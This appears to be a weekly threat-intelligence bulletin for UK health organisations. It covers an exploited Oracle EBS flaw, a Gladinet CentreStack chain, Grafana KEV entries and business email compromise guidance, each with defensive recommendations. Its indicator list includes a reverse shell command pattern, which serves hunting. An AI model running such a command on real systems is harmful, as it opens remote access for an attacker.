This week's report, we are facing a mix of old vulnerabilities being weaponised and new attack methods emerging fast. From a critical Oracle E-Business Suite flaw already being exploited in the wild to a pair of fresh SharePoint zero-days and a worrying Next.js authorisation bypass, attackers are proving that no platform is off-limits.
Oracle released an emergency fix for a critical unauthenticated RCE in E‑Business Suite (EBS) after widespread exploitation by the Cl0p/“Graceful Spider” group. The flaw sits in the BI Publisher integration within Oracle Concurrent Processing and carries a CVSS 9.8. NHS England issued a High‑severity Cyber Alert, and the NCSC urged immediate action. Reporting from multiple outlets indicates exploitation began as early as August, with extortion emails sent to affected organisations and a public PoC/exploit archive circulating. Admins must apply Oracle’s out‑of‑band update (on top of prior CPU prerequisites) and hunt for signs of compromise—not just patch and move on.
EBS often underpins finance, HR, procurement, and supply chains in health providers and suppliers. Compromise risks sensitive payroll/PO data exposure, service disruption, and reputational harm that spills into clinical ops. Given active exploitation and leaked tooling, treat this as an incident response priority, not a routine patch.
Recommendations:
Apply Oracle’s security alert for CVE‑2025‑61882 and required prerequisite CPUs; verify to the current fixed build.
Isolate EBS from the internet; enforce WAF rules and restrict to trusted IPs/VPN.
Hunt for IOCs and unusual BI Publisher/Concurrent Processing activity; review outbound connections and reverse shells.
Rotate credentials, invalidate sessions, and check for web shell remnants if signs of exploitation exist.
IOCs:
200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 observed contacting EBS
Exploit artifacts: oracle_ebs_nday_exploit_poc_*.zip, exp.py, server.py
Reverse shell pattern: sh -c /bin/bash -i >& /dev/tcp// 0>&1
Huntress reported—and BleepingComputer confirmed—active exploitation of a new unauthenticated Local File Inclusion flaw (CVE‑2025‑11371) in Gladinet CentreStack and Triofox. Attackers read Web.config to extract machine keys, then pivot to previously disclosed deserialisation (CVE‑2025‑30406) for remote code execution via ViewState. At least three organisations are known victims; a vendor patch wasn’t yet available at publication, though a mitigation to disable the vulnerable temp handler is provided. These products are popular with SMBs/MSPs for on‑prem “private cloud” file sharing—common in clinics and health suppliers. Expect copy‑cat exploitation as details spread; prioritise mitigation and internet exposure reviews.
File‑sharing platforms often hold PII, HR, and clinical back‑office files. An RCE chain here can enable data theft, lateral movement, and ransomware staging—especially in environments relying on MSP‑managed stacks. Private providers and vendors are likely users; NHS suppliers may be exposed indirectly.
Recommendations:
Apply Gladinet’s temporary mitigation immediately (remove the temp handler line) and restrict external access; monitor for vendor patch.
Rotate machine keys and app secrets; invalidate sessions/tokens.
Hunt for ViewState exploitation and unusual app‑pool activity; review web server logs for UploadDownloadProxy access.
CISA added multiple entries to its Known Exploited Vulnerabilities (KEV) catalogue last week, including a widely deployed Grafana path traversal (CVE‑2021‑43798). KEV additions indicate confirmed in‑the‑wild exploitation and are a strong predictor of real‑world risk. While these CVEs are not “new,” their active abuse makes them priority remediation items for any environment using the affected tech—particularly monitoring/observability stacks (Grafana) that often sit with elevated access. UK defenders should treat KEV updates as a ready‑made patching queue, mapped to business impact.
Many NHS providers and vendors run Grafana and similar tooling to monitor clinical apps and networks. A compromised monitoring platform gives attackers credentials, tokens and visibility for lateral movement. Align patch cycles to KEV—especially for internet‑exposed dashboards.
Recommendations:
Cross‑check KEV adds from 6 & 9 October and fast‑track patches/mitigations; verify versions and exposure.
Lock down Grafana (restrict ingress, SSO/MFA, secrets scanning) and rotate tokens/credentials if exposure suspected.
Subscribe to KEV updates and feed them into risk‑based vulnerability management.
The NCSC published updated BEC guidance aimed at UK organisations. BEC remains a top route to financial loss, with attackers hijacking conversations, spoofing executives, and altering payment details. The guidance is practical: secure accounts with MFA and role‑based access, harden email (SPF/DKIM/DMARC), use strong approvals for financial changes, monitor for suspicious mailbox rules, and prepare incident playbooks. For health organisations and suppliers, BEC often targets procurement and patient‑fund pathways, turning simple inbox compromise into fraud and data disclosure. Use this to tighten controls before the next invoice diversion attempt.
Even where clinical systems are unaffected, BEC can drain funds, disrupt supplier relationships and expose patient data. Many NHS/private providers have complex supply chains—fertile ground for invoice fraud. The NCSC’s playbook offers low‑cost, high‑impact controls.
Recommendations:
Enforce MFA and conditional access; monitor for malicious inbox rules and impossible travel.
Implement DMARC with reject, and use out‑of‑band verification for bank detail changes.
Train approvers to spot thread‑hijack signs; ensure rapid payment recall paths are documented.
Patch Oracle EBS now and hunt for exploitation, mitigate Gladinet CentreStack/Triofox if in use, and action the KEV entries—especially Grafana. Round it off by tightening BEC controls in finance and procurement.
Need help? Speak with our team about our Threat Intelligence and tailored patch/hunt guidance for UK digital health.